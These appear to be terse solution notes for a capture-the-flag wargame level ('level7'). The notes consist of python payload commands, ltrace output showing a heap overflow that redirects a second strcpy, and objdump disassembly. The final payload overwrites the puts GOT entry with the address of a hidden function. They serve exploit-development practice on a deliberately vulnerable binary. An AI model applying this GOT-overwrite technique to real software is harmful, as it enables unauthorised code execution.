

python -c "print('a' * 20 + 'AABB')" > /tmp/sol7a

ltrace ./level7 $(cat /tmp/sol7a) xxxxxxxxxxxxxxxxxxxxxxx
    strcpy(0x0804a018, "aaaaaaaaaaaaaaaaaaaaAABB")                               = 0x0804a018
    strcpy(0x42424141, "xxxxxxxxxxxxxxxxxxxxxxx" <unfinished ...>


objdump -d -Mintel level7
    08048400 <puts@plt>:
     8048400:       ff 25 28 99 04 08       jmp    DWORD PTR ds:0x8049928
     8048406:       68 28 00 00 00          push   0x28
     804840b:       e9 90 ff ff ff          jmp    80483a0 <_init+0x34>



    080484f4 <m>:
     80484f4:       55                      push   ebp
     80484f5:       89 e5                   mov    ebp,esp
     80484f7:       83 ec 18                sub    esp,0x18
     80484fa:       c7 04 24 00 00 00 00    mov    DWORD PTR [esp],0x0
     8048501:       e8 ca fe ff ff          call   80483d0 <time@plt>
     8048506:       ba e0 86 04 08          mov    edx,0x80486e0
     804850b:       89 44 24 08             mov    DWORD PTR [esp+0x8],eax
     804850f:       c7 44 24 04 60 99 04    mov    DWORD PTR [esp+0x4],0x8049960
     8048516:       08
     8048517:       89 14 24                mov    DWORD PTR [esp],edx
     804851a:       e8 91 fe ff ff          call   80483b0 <printf@plt>
     804851f:       c9                      leave
     8048520:       c3                      ret


python -c "print('a' * 20 + '\x28\x99\x04\x08')" > /tmp/sol7a ;  python -c "print('\xf4\x84\x04\x08')" > /tmp/sol7b

ltrace ./level7 $(cat /tmp/sol7a) $(cat /tmp/sol7b)                             
    strcpy(0x0804a018, "aaaaaaaaaaaaaaaaaaaa(\231\004\b")                       = 0x0804a018
    strcpy(0x08049928, "\364\204\004\b")                                        = 0x08049928

./level7 $(cat /tmp/sol7a) $(cat /tmp/sol7b)
